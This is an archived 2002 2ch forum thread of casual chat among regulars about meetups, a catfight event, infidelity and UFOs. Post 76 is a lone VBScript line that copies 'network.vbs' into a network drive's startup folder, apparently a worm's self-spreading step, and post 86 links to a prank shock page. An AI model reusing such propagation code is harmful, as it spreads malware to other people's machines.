2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ポチョ】 スマ(-ー-)ンコ 【ブロッコリー】

1 :アスパラ:02/06/29 01:21 ID:???
コヴァワ ブロッコリーでつ

前すれ。

【ポチョ】 スマ(-ー-)ンコ 【無菌】
http://kaba.2ch.net/test/read.cgi/intro/1022177227/


2 :可憐 ◆XaFGARAM :02/06/29 01:36 ID:???
2アスパラ

3 :トルシエ男爵 ◆BARON58A :02/06/29 01:38 ID:???
3アスパラ

4 :ポチョ ◆.POchoSM :02/06/29 01:44 ID:???
4アスパラ

って!!また知らないうちに立ってるジャン!!
だ、誰立てたの?コワヒヨ。。。

皆さんヨロ♪

5 :可憐 ◆XaFGARAM :02/06/29 01:48 ID:???
ジャイコが建てました

てか、ポツォ病人なんだから毛なさい!



6 :ポチョ ◆.POchoSM :02/06/29 01:51 ID:???
>>可憐
は、はい。。。
もうねまっせ!!

                 毛

今度キャンプファイアー逝かね?炎の前で飲みまっせ!!
じゃね♥

7 :はじめまして名無しさん:02/06/29 02:56 ID:kE6Jk5nz
炎の前で飲んだらカリフラワーになっちゃうよ。

8 :可憐 ◆XaFGARAM :02/06/29 09:44 ID:???
ブロッコリー→アスパラ→カリフラワー→・・・マイタケ・・・・
どんどん頭おっきくなっちゃうね

9 :しらふ。 ◆abc..... :02/06/29 13:14 ID:???
ブロッコリーカットにしたの?
素敵すぎ。
新スレおめ。

10 :ポチョ:02/06/29 14:31 ID:???
お、おまいら・・・
頭の事はもぉイイズラ!!
最終的にはマッシュルームになる予定(TーT)
>>可憐
カモォイの美容院だめぽ・・・ヤスーけど。
>>しらふ。
もしかしたら7/5の相模原、参加させてもらうかも!?そん時はヨロ♪逝けそうならスレに書きまっせ!

なんしかビデオ借りまくりな漏れ。
オススメ教えて!エロ(-ー-)モネ♪

11 :カタギじゃないのよ名無しは:02/07/01 00:54 ID:???
マッシュルームといえば・・・

      γ__ 
     /   \
    /      ヽ.
   ( ( ノノノ从ノ从 ))
   ヽノノ ^  .. ^ ノ   こんにちは。
    ⊂   ▽  ,⊃
      ノ      (
    (_ノ⌒(_)


12 :ポチョ ◆.POchoSM :02/07/01 01:17 ID:???
なんしか新横逝ってきますた。23時30〜
決勝終わって・・・
興奮したので・・・ツイ。。。

スゲー人。
ジイサマ・バアサマから族ッキー・右翼・やkざまで・・・
そのうちの族ッキーに絡まれますた(TーT)コワヒヨ

一番圧巻だったのはワゴンの上でマッパで踊るブラジル人(モチ女性)
マッパよ、マッパ。マッパってのは下もだYO!!(でも外人女性はNOな漏れ)
疲れたので・・・
         ねまっせ!!(-ー-)ネレルカナ?


13 :気骨 ◆kiko2mWw :02/07/01 01:37 ID:???
ブロッコリーにいさんハァハァ


14 :浮き ◆DARUMAoM :02/07/01 05:06 ID:???
記念ぱぴこ

15 :しらふ。 ◆abc..... :02/07/01 11:32 ID:???
ぱぴこはグリコ。

16 :ポチョ:02/07/01 14:01 ID:LpGtnrff
>>気骨
おかえり♪お土産無かったら・・・コワヒヨ
>>浮き
チッ!見つかったか・・・浮きの悪口スレなのに(-ー-)ニヤ
>>しらふ。
夜マーメン喰い逝かね?

17 :浮き ◆DARUMAoM :02/07/01 15:28 ID:???
>>ポチョ
うっせーよw
いいからデルピエロ見た感想言えってば

18 :ポチョ:02/07/01 15:44 ID:???
>>浮き
デルピエロカコイイ!!
グラサンが似てますた(●ー●)グラサンダケ
キャンプファイア語り会は御都合どですか?

19 :浮き ◆DARUMAoM :02/07/01 20:17 ID:???
謙虚なやつだなぁw
漏れなんか見た瞬間「ぽ、ポチョ!」思ってワラタyp-

キャンプファイア詳細キボソ

20 :ましんがん:02/07/01 20:39 ID:???
なにここ?

21 :カイ:02/07/01 21:33 ID:???
こんばんわ。
何気なく発見してしまったので、とりあえず足跡のこしときます。
ちなみに飲み潰れオフのスレってどれっすか?

22 :ポチョ ◆.POchoSM :02/07/01 23:56 ID:???
>>浮き
平日になる思うます。詳細きぼん♪ウ、ウキ幹事よ(-ー-)マジデ
>>20
ここすまんこ。
>>カイくん
飲みバトル・・・ここではないッス!!


浮気ってどうなの?って思う今日この頃です。キミラどこからが浮気?

23 :まがんしん:02/07/02 00:22 ID:???
>>22
密会

24 :はじめまして名無しさん:02/07/02 00:52 ID:???
どっちが本気かわからない今日この頃・・・

25 :ポチョ ◆.POchoSM :02/07/02 01:11 ID:???
>>23
だ、だよね!!密会ってダメよね!!キミトハ(-ー-)トモダチダ・・・ダ、ダレ!?
>>24
どっちも本気。。。どっちも手抜き。。。

浮気じゃなくて浮きだった。。。すまんこ。

26 :はじめまして名無しさん:02/07/02 01:42 ID:???
>>22
ケコーンしてなきゃ浮気なんて言葉は当てはまらないし
心が通じてれば体が離れてもオケーです!


質問です!先生!修羅場になった事はありますか?
漏れ、以前はち合わせって事あったけど・・・ドキドキだったYO!

27 :ポチョ ◆.POchoSM :02/07/02 02:24 ID:???
>>26
心が通じてるか・・・・
深いよその辺は。
またジクーリ話そうよ!!(-ー-)サケデモイレテサ  つかダ、ダレ?wダレデモ(-ー-)イイカ!!

修羅場
ありまっせ!!
泊まってる部屋に乗り込まれたことありまっせ(TーT)
ひっぱだかれて・・・・記憶が戻った時には3人でマック喰ってたw
頭真っ白でどんな言い訳したかも覚えてないッス。
なんしか、『ここどこだYO!!』って叫んだ後にカウンターのピンタが(TーT)シニマッセ!

28 :はじめまして名無しさん:02/07/02 20:21 ID:???
>>26
あんた最悪やな

29 :はじめまして名無しさん:02/07/02 20:25 ID:???
>>27
ひとでなし

30 :ポチョ ◆.POchoSM :02/07/02 23:49 ID:???
>>28
>>27への誤爆?w

>>29
ワラタ
そ、それだけ?
さっすがナナシ(-ー-)イロイロアルノヨオトナハ♪

でも、浮気はいけないことです(TーT)しても、されてもダメ!!すまんこ。
ネタか実話かは漏れを知ってる人のみぞ知る(-ー-)アタリマエー


31 :はじめまして名無しさん:02/07/03 00:04 ID:???
>>26の方が自覚症状ないだけイタタタタ
最悪な男の典型的パターン

32 :ブロッコリ ◆dspCASJY :02/07/03 01:39 ID:???
浮気なんて屁のつっぱりにもならん話はヤメヨ!(TーT)スマンコ



33 :ブロッコリ ◆dspCASJY :02/07/03 01:43 ID:???
なんしかトリップどお?

34 :ブロッコリ ◆vxq/qAGs :02/07/03 01:45 ID:???
(T_T)

35 :カタギじゃないのよ名無しは:02/07/03 02:03 ID:???
このスレを紹介いたします。

http://natto.2ch.net/test/read.cgi/off/1024299698/l50

36 :はじめまして名無しさん:02/07/03 02:17 ID:???
http://www.aa.wakwak.com/~rewmew/files/harry.jpg
真ん中の子カワイイよね?

37 :はじめまして名無しさん:02/07/03 02:37 ID:???
>>28>>29>>31は同じヤシ!
もてない男の典型的パターン(ププッ

38 :sa- ◆sA/C5.5c :02/07/03 05:11 ID:???
浮気はイカンだす記念かきこ。

39 :はじめまして名無しさん:02/07/03 09:15 ID:???
>>38
とかいうアナタも浮気してるトラップ。

40 :浮き ◆DARUMAoM :02/07/03 09:18 ID:???
浮きだか浮気だかハッキリしろってば!
なんか漏れの事言われてるみたいで腹立つぞw

41 :ポチョ:02/07/03 10:52 ID:???
>>さー
なんしか、お久しパピコ!ちろパピコにもヨロ♪
>>ナナシ
うるせー便器マン
>>浮き
半年プリにサシオフきぼんぬ
>>ガラム女王
トリップ変です(TーT)

最近仕事終わってからマンキに逝くのが唯一の楽しみ(TーT)イイジャン
ジャンプ制覇までの道のりは遠い・・・

42 :はじめまして名無しさん:02/07/03 14:40 ID:???
>>26=>>28=>>29=>>31=>>37
全部ジサクジエンでした

43 :浮き ◆DARUMAoM :02/07/03 15:39 ID:???
>>ポチョ
ゆっくりメシでも食いたいねー(はぁと

44 :姐さん ◆BrNEKOAA :02/07/03 22:05 ID:???
あ、ポチョタソのスレだ ヽ(´▽`)ノウワァァァイ
記念ぱぴ♪(今さら)

45 :ブロッコリ ◆.POchoSM :02/07/04 02:24 ID:???
>>浮き
初心にかえりたいです
>>姐さん
おおおお〜
お久しぶりでス♪
姐さんが監視してくれないのでこんなになっちゃいますた(T_T)漏れ。
は、早く大吉逝く!!

46 :ポチョ:02/07/04 17:33 ID:???
UFOとか超常現象とか霊とか信じます?

漏れは信じないっス!特にUFO!!
でも・・・
中国で目撃された、馬をひと飲みするくらいデカーな魚は信じてる(-ー-)イルヨ!

47 :姐さん ◆BrNEKOAA :02/07/04 17:56 ID:???
そか 大吉かぁ〜〜〜


 こ ん ど は ゆ っ く り 飲 め ま す か ?(笑

48 :ポチョ:02/07/04 19:40 ID:???
>>姐
この前は放置して(TーT)すまんこw
い、入れ代わりたくなかったんだもの・・・
今度はVIP席で!w


49 :ちろ ◆chir03hE :02/07/05 00:18 ID:???
名前が上がってたので記念パピコw

50 :気骨 ◆kiko2mWw :02/07/05 02:06 ID:???
UFOはあります!
矢追先生を信じてこの歳まで生きてきますた

尊敬する人はモルダー捜査官です

51 :ジャイ庵:02/07/05 02:13 ID:???
11 :かおりん祭り ◆KAORinK6 :02/06/12 23:14 ID:???
;;ヽ____   ___/;;;;ノ
____(〒)____]
:::::/         \:::::::.\  
::/            ヽ:::ヽ::|  
::|   ∋8ノハヽ8∈    |:::::::|:::| <新スレおめでとうございまーす♪ 
::|     ( -ー-)    |:::::::|::::| 
::|  | ̄ ̄○○ ̄ ̄| .|:::::::|:::::|
::|   .\_____/  |:::::::| ̄ヽ
:::\           /::::::|_丿
::::::::\______/:::::::::::|


52 :ポチョ ◆.POchoSM :02/07/05 03:38 ID:1aNYIH8e
>>ちろパピ
さんくす、何気に一言二言しか会話ないよね(TーT)
また飲みいきまっせ!つか、誘ってねw
>>キコ
いや、居ないって!!矢追のジュンちゃんが宇宙人?
漏れUFO居る居ない話は酒入ると燃えまっせ!!ヤッパ(-ー-)イナイヨ
>>かおりん祭り庵
ここには来てくれないのね(TーT)ホンモノコイーヨ!!

53 :浮き ◆DARUMAoM :02/07/05 06:29 ID:???
霊がUFOに乗って来るのが超常現象なんだよ!
・・・・・何度言わせるんだよお爺ちゃん

54 :ポチョ ◆.POchoSM :02/07/05 13:45 ID:???
BBQいつにしる?
釣りもやりたいし。

55 :sa- ◆sA/C5.5c :02/07/05 14:48 ID:???
うちの親はノアの箱舟を庭で見かけたそうです。

56 :ポチョ ◆.POchoSM :02/07/05 16:03 ID:???
>>浮き
霊を信じないくせに人一倍怖がりな漏れ。ドウニカ(TーT)シル!!
>>サー
そ、そんな事外で言っちゃダ、ダメ!!w

気骨の腹は超常現象ってのダケはこの目で見たから信じる。

57 :オチコ ◆ajavwfSA :02/07/05 16:13 ID:???
・・・・・・ウ・・・・ワキ・・・ダメ・・・・









デモバレナイヨウニオヤリナサイ・・・・・・・ネ。クスッ・・・

58 :ポチョ ◆.POchoSM :02/07/05 16:17 ID:???
ワオ!!
落ち子とリアルタイムで会話できる!!

ヤ、ヤヴァ―・・・・
周りは誰も居ないし・・・・漏れ一人じゃ無理だよ。。。

59 :ポチョ ◆.POchoSM :02/07/05 16:22 ID:???
でも、出かける時間だ(TーT)

長い間、落ち子誰だ!!ってなってたけど・・・・
やっと分かったよ♪








                           ヤッパ(-ー-)ウキダ!!
                          ネ、ソウイウコトニシテ。。。

60 :オチコ ◆ajavwfSA :02/07/05 16:24 ID:???
オチコ・・・・・パソコン・・・・・モッテナイノ・・ダッテ、ポチョガw・・・ニ







マンキッサヒサシブリ・・・キタ・・・・シンスレハケン・・・ξ。ワソイ  

61 :オチコ ◆ajavwfSA :02/07/05 16:27 ID:???
オチコトリップハネ・・・






#オチコ・・・・・・デオッケイヨ・・ナンツッテナンツッテ♪・・・・

62 :姐さん ◆BrNEKOAA :02/07/05 16:55 ID:???
わーい びっぷ びっぷ〜♪



・・・・・デ、   ビップッテ ナニ?


63 :ポチョ ◆.POchoSM :02/07/05 17:00 ID:???
あああああああああああ〜〜〜〜

パソ持ってない・・・・
漏れに微妙に粘着・・・・
先輩・・・・
武塾・・・・

ひ と り だ け 心 当 た り が イ タ ! !

((;゚Д゚)ガクガクブリブリ  藤原先輩・・・・成仏しる!!




64 :ジャイ庵 ◆ik6Yqz0I :02/07/06 03:41 ID:???
夜食オフやりまっせ!来週の木曜、藤が丘の御天に0時集合!

65 :ジャイ庵 ◆D2xgd4tM :02/07/06 03:42 ID:???
kouka?


66 :ポチョ:02/07/06 13:10 ID:???
>>ジャイ庵
了解了解

なんしかモナコ逝きますた。旧館の702号室にメッセージ残してきますた。
どんなメッセージ残したか当てた人(見に逝った人)は送迎付き焼き肉奢り券贈呈。
い、一緒に見に逝くのも可w(-ー-)ブジニカエレルカナ?

67 :ポチョ:02/07/06 22:05 ID:???
今日の運勢は
【大吉】(-ー-)アンゴウ

68 :はじめまして名無しさん:02/07/06 22:40 ID:???
>>66
旧館の702号室ね了解すますた(ビシッ)ちかぢか見に行ってみます。

>>64
11日か。。。(-ー-)ニヤリ

69 :可憐 ◆crazy/6M :02/07/06 23:40 ID:???
ヨーシ、私も702にメッセージ残しにいくぞ

70 :はじめまして名無しさん:02/07/07 00:01 ID:???
>>69
69なんてHだなオイ誰と逝くんだ?

71 :可憐 ◆crazy/6M :02/07/07 00:06 ID:???
>>70
69はダイッキライの部類です

72 :しらふ。 ◆abc..... :02/07/07 01:13 ID:???
ガチャピンよりはムックですよ。

73 :ジャイ庵:02/07/07 02:12 ID:???
ムックよりもゴン太君ですよ。

御天:もえぎ野店 早めに逝って呑むぞ!
http://www.go-ten.com/

74 :ポチョ ◆.POchoSM :02/07/07 02:14 ID:???
>>68
薄れゆく意識の中で書いたメッセージなのでかなり達筆かとw
11日お待ちしてまっせ!!
>>69
本当は新館の703号室が漏れの専用部屋なんだけど・・・
なんて書いてあったか当てたら焼肉いきまっせ♥
>>70
若いな。。。
>>71
大好きの・・・(以下略
>>72
ガチャピンがスキューバしてる姿に感動しますた。お、泳げないんだけどね(TーT)モレ。

なんしかお久しぶりに中山大吉で飲んできますた♪
リアル友達のお二人に贈る感謝と焼き鳥を込めてピンポイントオフレポ♪
>>素無タン
か、髪切った?漏れは気付いてましたよ(-ー-)カワユイ!!
>>やまなか
な、なんで最後にまた食べる!!なんしか今度は紀州屋リベンジ!!
>>浮っき―
次回は是非是非!!酔いどれヘタレは大吉から始まったw

なんしか大吉久しぶりですた。温かい雰囲気と甘いジャガバタ♥
紀州屋に勝るとも劣らない落ち着く空間。。。
美味い酒が飲めますた。
また皆で逝こうYO!!(-ー-)セマイケド♪

お疲れッス♥



75 :カタギじゃないのよ名無しは:02/07/07 06:37 ID:???
もうねる。おやすみ〜

76 :はじめまして名無しさん:02/07/07 13:25 ID:???
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"


77 :ジャイ庵:02/07/09 01:27 ID:???
明日ポチョの店の宇宙企画見にいきます。

78 :しらふ。 ◆abc..... :02/07/09 20:14 ID:???
昨日ポチョさんが宇宙飛んでました。

79 :名無しィ:02/07/09 20:15 ID:???
来週の金曜なんていかがでつか?
地球でも釣りに・・・

80 :ポチョ:02/07/09 20:38 ID:???
今日ジャイ庵が遊びきますた。お店の人々はブルッて出てきませんですた。
お店に帰ると『だ、大丈夫?友達なの?』聞かれますた。
元気良く『うん』答えますた。

>>しらふ。
髪型はUFOカットですがなにか?(TーT)
>>名無しィ
リアカノ連れて逝ってイイ?


81 :ジャイ庵:02/07/10 01:13 ID:???
今日ポチョの店に遊びにいきますた。お店の人々はなんでか出てきませんですた。
お店の中からポチョが呼ばれて、『油売ってねーで宇宙企画売れ』って怒られてたみたいですた。
て思ってたyp。


82 :カタギじゃないのよ名無しは:02/07/10 01:30 ID:???
本物の友情が読めるのは、ポチョスレだけ!!

83 :はじめまして名無しさん:02/07/10 01:58 ID:???
ポチョムキン↓?
http://otokos.net/photo/annex/4028_Field11.jpg

84 :ポチョ ◆.POchoSM :02/07/10 01:59 ID:???
次回はの会社訪問はカタギさんに決定しますた。

グラサンかけたジャージ二人組が乗り込む予定です。覚悟オケ?(-ー-)ハンソデタンパン!!

85 :ポチョ ◆.POchoSM :02/07/10 02:15 ID:???
>>83
ワラタ
近からず遠からず!!
つか、このホテルは・・・・ラ・ルーンじゃないかい?いや、テレビの下の台が似てたからw

86 :はじめまして名無しさん:02/07/10 03:38 ID:wsZSHzY+
http://membres.lycos.fr/phallusphincter/Waldo.html
ウォーリーをさがせ!!


87 :新岡 ◆niiokaus :02/07/10 04:15 ID:???
>>86
ぎゃあああああああああああああああ!!!!!

88 :カイ:02/07/10 11:35 ID:???
>>86
ホンキでびびった

89 :ポチョ:02/07/10 15:24 ID:???
>>86
漏れは見ないYO!!
コワヒのダメ(TーT)ダメ

90 :はじめまして名無しさん:02/07/10 15:54 ID:???
>>86
つまんね、グロじゃねーじゃん

91 : ◆ik6Yqz0I :02/07/10 16:47 ID:???
ア・・・・・・

92 :ポチョ ◆.POchoSM :02/07/10 22:08 ID:???
なんしかものすごい雨・風・台風ですな。
明日のキャトファイは大丈夫かな。。。

カンキャク(TーT)モレラダケ?

93 :カタギじゃないのよ名無しは:02/07/11 00:32 ID:???
もう、嵐は過ぎたみたいですね。
涼しくて心地よい。

94 :ジャイ庵:02/07/11 01:14 ID:???
明日の予定
17時:鴨居らへん
18時:仲町台周辺
20時半:新宿パラダイステレビ
0時:もえぎ野御天

つーことで、昼間メールいれときまつ。

95 :はじめまして名無しさん:02/07/11 02:50 ID:???
よくさー、本当に2人の人を同時に好きになっちゃったからどうしようもなくて
二股してるとかって人いるじゃん?
それって嘘だよね

96 :はじめまして名無しさん:02/07/11 07:17 ID:???
嘘ではないだろ
良いか悪いかも当人同士の問題


97 :ポチョ ◆.POchoSM :02/07/11 13:26 ID:???
オハヨーゴザイマツ♥
台風の後はファイ!日和ですYO!!

>>93
乗り込むので待ててね♥

>>94
了解了解♪
晴れてヨカータ(-ー-)マジデ!!

>>95
全部が全部嘘ではないが十中八九・・・・嘘ですな。
バレた時の言い訳ですな。

>>96
全部が全部悪い事ではないが十中八九・・・・悪い事ですな。
同時に好きになった方はイイかもしれないが、
好きになられた方の二人はたまったもんじゃないですな。

こんな晴れた日はドライブでもしたい気分ですな。


98 :ポチョ:02/07/11 20:29 ID:???
キャットファイ受け付け終了
居酒屋でチョトイイ気分になってからファイ!



99 :可憐 ◆crazy/6M :02/07/11 23:59 ID:???
|ω゚)〃ササッ

100 :可憐 ◆crazy/6M :02/07/12 00:01 ID:???
    彡ミミミヽ ノ彡ミミ)
   ((彡ミミミミ))彡彡)))彡)
   彡彡゙゙゙゙゙"゙゙""""""ヾ彡彡)
   ミ彡゙ .._    _   ミミミ彡
  ((ミ彡 '´ ̄ヽ '´/ ̄ ` ,|ミミ))
  ミ彡  ' ̄ ̄'  〈 ̄ ̄ .|ミミ彡
  ミ彡|  ) ) | | `( ( |ミ彡
  ((ミ彡|  ( ( -し`) ) )|ミミミ   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ゞ|  ) )  、,! 」( ( |ソ   < 100げっとした!感動した!
     ヽ( ( ̄ ̄ ̄' ) )/      \_______________
     ,.|\、)    ' ( /|、
   ̄ ̄| `\.`──'´/ | ̄ ̄`
      \ ~\,,/~  /
       \/▽\/


101 :飛行象 ◆HIKOZOhQ :02/07/12 00:12 ID:???
100げと〜・・・・・って遅かったか・・・チッ・・・

102 :カタギじゃないのよ名無しは:02/07/12 02:06 ID:???
とてもよかったです、猫格闘。
直前の一杯呑み屋の梅ソーダもよかったし、言うことなし!
あの映像をまぶたに焼き付けて、今日は眠りにつきませう。

追伸:まさかトリオでヌかれるとは!!明らかに場違い3人組(w

103 :ポチョ ◆.POchoSM :02/07/12 02:18 ID:???
お疲れッス♪
【キャットファイINパラダイスTV〜ラーメソ仰天】興奮と投げキッスを込めてピンポイントオフレポ
>>ジャイ庵
ま、まさか最後の最後にあんな事故に遭遇するとは!!
交通整理しなかったら二次被害勃発よね。
新宿居酒屋梅ソーダウマー!!いちごミルク選手のパンチーもウマー!!

>>かたぎ
カナダ人選手の投げキッスをほっぺにピタッされてる時の顔ったら!!ワラタよ!!
スーツにグラサン・・・・チョト目立ちすぎじゃないの?(-ー-)スッパヌカレタネー
『す、すごいやん!!カメラマンじゃまやわー』隣りでブツブツ言わない!!
なんしか高速代のカードありがとうございますた。助かりますた!!

なんしかキャットファイおもろかった。2ちゃんねらはおそらく漏れ等3人だけだったのかな?
漏れ等だけグラサン。。。周りは人とは思えぬ異形の目つきをしたハアハア軍団。。。
漏れ等がやたらと浮きまくってますた。
漏れ等3人のドアップが見れるのはキャットファイだけ!!

ま、また逝きましょう!!なんしか濃い一日ですた。




104 :ジャイ庵:02/07/12 04:15 ID:???
梅宮のいないキャットファイトはイマイチ笑いが薄かったですた。
地下のIWCPチャンピオンはカコイカッタ。

ウ、ウイロー・・・

105 :さんしょ:02/07/12 09:19 ID:???
梅宮女氏出なかったすか・・・
出る時は直電で呼んでほしいくらいです。



106 :とき=SGQ:02/07/12 09:24 ID:???
↑俺っす

107 :ポチョ:02/07/12 13:24 ID:???
>>トキ
なんしかお久しプリ♪昨日は、絶対トキ居るよな〜って話してたよwまた逝った時はヨロ!
あっ!パラダイスの近くの飲み屋で自家製梅ソーダの激ウマー見つけたから逝こうYO!

108 :新岡 ◆niiokaus :02/07/12 15:11 ID:???
俺の家から横浜って、1時間ちょいくらいで着きます。チャリで。
単車の免許更新してないからチャリしか乗れねえのです。

109 :ジャイ庵:02/07/12 17:16 ID:???
>ポチェ
ttp://www5d.biglobe.ne.jp/~cpe/A6_1.htm
これでるの?ww

110 :あね:02/07/12 23:27 ID:???
>ポ
昨日はネタにネタレスしてみたんだけど・・・(また来たよな・藁)
いい加減 放っといた方がいいのかもねぇ
野良猫にネサ与えると なついてくるのと一緒だよな(-д-)
(話が見えなかったらスマ(-ー-)ンコ )


111 :ポチョ ◆.POchoSM :02/07/12 23:30 ID:???
>>姐
そうね、同感!!
けど・・・熱くなっちゃいます(TーT)
ホンスレは漏れにとって故郷w

112 ::02/07/12 23:37 ID:???
>ポ
気持ちは同じっすヨ
But 相手にすんなって毛からイエローカードきたw

113 :ポチョ ◆.POchoSM :02/07/12 23:40 ID:???
>>姐
パパの意見は偉大でつ。
息子は父毛の背中を見て育つのでつw

114 ::02/07/12 23:46 ID:???
この続きは大吉で(-ー-)

                            テユーカ ダイキチ イツ!?


115 :ポチョ ◆.POchoSM :02/07/12 23:54 ID:???
>>姐
姐とパパスとなかと庵と砂と漏れの時間がアッタ時・・・・(超馴れ合いw)
自然と足は大吉へw

飲みたいっす久々に姐とw

116 ::02/07/13 00:12 ID:???
(゚Д゚)無理

117 :ポチョ ◆.POchoSM :02/07/13 00:59 ID:???
>>庵
ハヤッ!!

118 ::02/07/13 01:01 ID:???
(゚Д゚)無理

119 :ポチョ ◆.POchoSM :02/07/13 01:03 ID:???
>>砂タン
そ、それは・・・・
漏れの時間の事でつか(TーT)

120 :◆orangerg :02/07/13 01:18 ID:???
>>ポチョさん
ちょと乗ってみました。スマソ
土夜あたりなら参加可能っす。

121 :ポチョ ◆.POchoSM :02/07/13 01:58 ID:???
>>砂ヤン
また皆で集まりたいでつ♪
いや、まてよ・・・・
庵の(゚Д゚)無理!!は・・・遠いからか(TーT)
は、はやく浜線沿線に引っ越す!!それ一番大事!!



122 :ジャイ庵:02/07/13 03:33 ID:???
土曜日の早い時間から紀州屋きぼんぬ。22時頃にはベロンベロンに酔っ払ってたいっす。

123 :ジャイ庵:02/07/13 04:00 ID:???
ひょっとして、おちこって姐さん?

124 :とき=SGQ:02/07/13 05:26 ID:???
>>ぽちょっ
梅酒・・・・ぐほほほほ飲みてぇーーーー!

うちの会社、社長が戻ってきたから少し時間が出来そう・・・
むほほほっ!

今度、パラに行く時は誘ってみてよ、出来る限り
参加するようにしますんで・・・


125 :◆DARUMAoM :02/07/13 08:09 ID:???
とき=SGQの○○○カキコが健在な事にほっとしたりする漏れは変ですか

126 :はじめまして名無しさん:02/07/13 10:32 ID:???
  /\           ┃┃               / ー  //ノ
 /\、 \  ━━ ━╋━    ━━┓━━┓━━ /ヾヾ   ヽ/
 |:/ ヽlll \━━ ━╋━ ╋┓  ┃   ┃   ┃/   /== lヾ〜 新
 | `ヽ、二 \━   ┃  ┃   ┃   ┃  ┃/   /    |=ー ス
./ -ニヽ、   _.\◎、=二ーフ     ; ;      /    / 二  ヽー〜レ
r-‐‐‐--、  二ニ\ へ ` ̄      ;      /    / <´@ ヽ  )=ー ェ
| ̄ ̄`i --' r‐‐---\ \;―― ,---、___    /  〃::::ヽ `ー ´/ー_ エ
i、----//~l\ヽ_____/\     ∧∧∧∧∧ // ´ヾ ) ,、)  (      エ
.`| ̄ / ノ┐`‐--‐'´ / \  <        >  iiiiiliilillllilllillllllil,,, \=〜  ッ
 `l`l<ヽニ-'´ヽ、  ,-‐' /ト \<     バキ  >ll/二二二二ヽi    )―_ ッ
  \`‐‐-‐-‐->    / |   <  予  ス . >//〜〜〜ヾ/ノi /
――――――――――――<  感  レ >――――――――――――
___ , - ´    ̄ `ヽ、:::::::::<  ! の  >ミ\_|    ,'、 /\\   
:::::::::::::::/    ,-´ ̄  丶::::::<.        > 彡      /   \`\ /
:::::::::::::/    / ,-´ ̄    ヽ ::::∨∨∨∨∨    #     ,、―-、__\_`l |
::::::::::/ / ̄`/   / ̄`   )::::::::::::::::/     ,、‐‐  彡 ) −<、 `l \/
::::::::| / ̄`    |/o~ ヽ  ( ::::::::::::/ ―    l、  /``\/  ̄`― ̄ /立
::::::::|  / ̄`\   l `ー ´   )/ / <\_  ,、‐`|ll、    ) )       /
::::::::|  ( / ~oヽヽ  ヾ     ヽ、 /  \ `ヽ-、///ヽ-、,、/     彡/ っ 
::::::(ヽ   `ー ´ ヽ   `)ヽ- 、, //    `\_  `―、/_||  `l    |
 ̄/ヽ | /     /(_,-´   ,/ |/ 、ー、    \___二> ヽ   /  た
 ヽ ヾ |     /  __,-‐/  /|`l \         /    /
  ヾ ヽ\_ ー=―― ´   / `l |  \--、_    /    ) /    ッ


127 :おちこ ◆BrNEKOAA :02/07/13 11:57 ID:???
キシュウヤハ・・・・・・ミンナ・・・スゴク・・・・・・ヨ・・ッパラウカラ・・・・・・・・





↑こんな?

128 :はじめまして名無しさん:02/07/13 13:15 ID:???
・・・・・遊びきれない恋なら、しちゃいけない。

129 :オチコ ◆ajavwfSA :02/07/13 13:26 ID:???
>>127






ウフフ・・・・・ミンナナカヨク・・・・

130 :ポチョ:02/07/13 13:26 ID:???
家帰ったらガクガクブルブリのAA貼るから待ててネ♪


コワヒヨ(TーT)オコラレテルミタイダヨ

131 :ジャイ庵:02/07/14 01:33 ID:???
今日は雨が降ってたんでオヤジの車借りて買い物いきますた。
帰りにガス入れようとスタンド寄ったんす。ガソリンスタンド。
で、
店員:「給油口開けてくださーい♪」
漏れ:「あい」 ボン!
店員:「トランク開きましたー!」
漏れ:「やべ!(汗」 ガコン!
店員:「・・・ボンネット開きましたー」

久々にパニクリますた。恥ずかしかったです。



132 :とき=SGQ:02/07/14 04:12 ID:???
>>125
基本的に・・・まじめなのよ・・・俺・・・ぷぷぷ

>>131
同乗していたかった・・・

133 :飛行象 ◆HIKOZOhQ :02/07/14 23:58 ID:???
>>131
ガススタでバイトしてた時、いますたね〜そのような方が。

ノズルささったままで走った客もいたっけな。。。。。



134 :ジャイ庵:02/07/15 01:05 ID:???
>>133
最近の車はよくわからん。ノズル刺さったままってのはバイトのせいだろw



135 :ジャイ庵:02/07/15 01:48 ID:???
>>129

おちこーーーーーーーーーーーーーーーーー!

136 :カタギじゃないのよ名無しは:02/07/15 02:06 ID:???
おちこのレスが読めるのは(今は)ポチョスレだけ!!

137 :ポチョ ◆.POchoSM :02/07/15 03:19 ID:???
落ち子がジンだった時の盛り下がりかたったらないんだろうな。。。

おちこがジンじゃありませんように&hearts;

ねまっせ!!

138 :オチコ ◆ajavwfSA :02/07/15 04:23 ID:???
プ・・・・・&hearts;デスッテ・・・・・・・・・・クスクス・・・・








>>135>>136
オチコハ・・・・ゲンキガナイトキダケ・・・・アラワレ・・・・ルノ
ダッテ・・・「オチコンデルオンナノコ」・・・ダモ・・・ノ・・・

139 :ポチョ ◆.POchoSM :02/07/15 09:05 ID:???
なんだ偽者か・・・

しゃ  べ   り   す   ぎ   ♥(レスマデツケテル(-ー-)ニヤ

140 :浮き ◆DARUMAoM :02/07/15 14:03 ID:???
てゆうか本物いるのか

31 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)